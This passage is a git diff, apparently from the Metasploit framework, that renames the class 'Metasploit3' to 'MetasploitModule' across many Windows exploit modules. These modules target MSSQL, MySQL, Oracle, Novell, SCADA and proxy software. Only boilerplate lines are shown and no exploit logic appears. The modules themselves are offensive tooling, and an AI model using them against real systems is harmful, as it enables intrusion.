@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 4b867975e7..34f7cbf704 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index cf947bc553..a12b6c76f8 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb index a7c7d48bfa..602dcce773 100644 --- a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb +++ b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ufo_ai.rb b/modules/exploits/windows/misc/ufo_ai.rb index de6bdafa9a..fbfeab6bd0 100644 --- a/modules/exploits/windows/misc/ufo_ai.rb +++ b/modules/exploits/windows/misc/ufo_ai.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index d6acee9bb0..8db7d2160c 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 34fe258f61..2038a67811 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 18d24e0ecc..4ac2312823 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Capture diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb index c20731b6f7..702c4c0e37 100644 --- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb +++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index 178db155a1..8b7959b40c 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index a4bb8bffe2..f16938f734 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index bebd9c7c2d..cf6ca68dcc 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index 91180f3205..4016a5c781 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index fa9004658b..c281adff24 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 320da58665..ebf8b5f23c 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index e9bc7580e0..70d8433c92 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index d5ebe45d04..3d76870629 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index 4ab1c8beb6..ae7a014bd5 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/exploits/windows/mysql/mysql_mof.rb b/modules/exploits/windows/mysql/mysql_mof.rb index 9c292c9619..b725efdf71 100644 --- a/modules/exploits/windows/mysql/mysql_mof.rb +++ b/modules/exploits/windows/mysql/mysql_mof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/windows/mysql/mysql_payload.rb index 46db38c85c..ec4908d59a 100644 --- a/modules/exploits/windows/mysql/mysql_payload.rb +++ b/modules/exploits/windows/mysql/mysql_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb index 5628daeca3..e327a41670 100644 --- a/modules/exploits/windows/mysql/mysql_start_up.rb +++ b/modules/exploits/windows/mysql/mysql_start_up.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index 8117dfec8f..b1f4985272 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 44eb354357..7eb98360a0 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index 0811a8ec5c..7f36adb06e 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index d1e2bd80c7..cf5ffbafb5 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index 79b9157845..f804a1afeb 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 212d81188d..d93490f75f 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index b437751a1a..47e020de48 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 36575b89bd..91b4b995b8 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index 8899a87ccf..9b12cc218e 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb index 08817cddeb..98e16a76dc 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb index 911d0683cf..5577884048 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb index bbc14601ec..bfc3cdb83d 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb index f4930191b4..bd7318ef14 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb index b305977fbb..d018f07b73 100644 --- a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb +++ b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Oracle Containers for J2EE/ ] } diff --git a/modules/exploits/windows/oracle/extjob.rb b/modules/exploits/windows/oracle/extjob.rb index 7af245692f..1ce2930169 100644 --- a/modules/exploits/windows/oracle/extjob.rb +++ b/modules/exploits/windows/oracle/extjob.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index bd720f2aee..e37b98a008 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::NDMP diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 8d33b8642c..f59db5a41d 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index 228927ad94..21d7fc7fb5 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index 5dcf583fc3..4b7cd04159 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index 2cd1ccf651..2c04639fb6 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 9fd971c9e6..32cfb0c1b9 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb +++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index 623accfec0..13711e0958 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] } diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index bae54e50bb..1b8875b4e9 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index 7dc8d3caef..2006bd8b07 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index 25e75addc9..104269200b 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/abb_wserver_exec.rb b/modules/exploits/windows/scada/abb_wserver_exec.rb index cdb7cdb0d7..467bb0092f 100644 --- a/modules/exploits/windows/scada/abb_wserver_exec.rb +++ b/modules/exploits/windows/scada/abb_wserver_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/citect_scada_odbc.rb b/modules/exploits/windows/scada/citect_scada_odbc.rb index 096e470c38..988432dd45 100644 --- a/modules/exploits/windows/scada/citect_scada_odbc.rb +++ b/modules/exploits/windows/scada/citect_scada_odbc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb index 709c87917f..995fd79dd9 100644 --- a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb +++ b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb index 48a22d1afb..c94193284d 100644 --- a/modules/exploits/windows/scada/codesys_web_server.rb +++ b/modules/exploits/windows/scada/codesys_web_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index bf791cc5d9..dc3b814a0a 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/scada/factorylink_csservice.rb b/modules/exploits/windows/scada/factorylink_csservice.rb index d9ccff31a2..9a8f17a1e5 100644 --- a/modules/exploits/windows/scada/factorylink_csservice.rb +++ b/modules/exploits/windows/scada/factorylink_csservice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index 01c93d561f..06edd9cdc4 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index 451686637c..2a81e8b6db 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/windows/scada/iconics_genbroker.rb b/modules/exploits/windows/scada/iconics_genbroker.rb index 13b9ae70c8..9f51cfa0f8 100644 --- a/modules/exploits/windows/scada/iconics_genbroker.rb +++ b/modules/exploits/windows/scada/iconics_genbroker.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb index 76d3ba0e37..9461c4b2e5 100644 --- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb +++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb index 5e5d0fe856..c107f557ee 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb index aa2097f34f..8fd355274a 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb index 41ba050c1b..0dfcda30ea 100644 --- a/modules/exploits/windows/scada/igss9_misc.rb +++ b/modules/exploits/windows/scada/igss9_misc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/igss_exec_17.rb b/modules/exploits/windows/scada/igss_exec_17.rb index ebd1fce53c..6f63c03418 100644 --- a/modules/exploits/windows/scada/igss_exec_17.rb +++ b/modules/exploits/windows/scada/igss_exec_17.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index 2c4fa65f6b..99725bef2f 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb index 9ac1d96811..d416fd0189 100644 --- a/modules/exploits/windows/scada/moxa_mdmtool.rb +++ b/modules/exploits/windows/scada/moxa_mdmtool.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index 0c27241964..b999c2608e 100644 --- 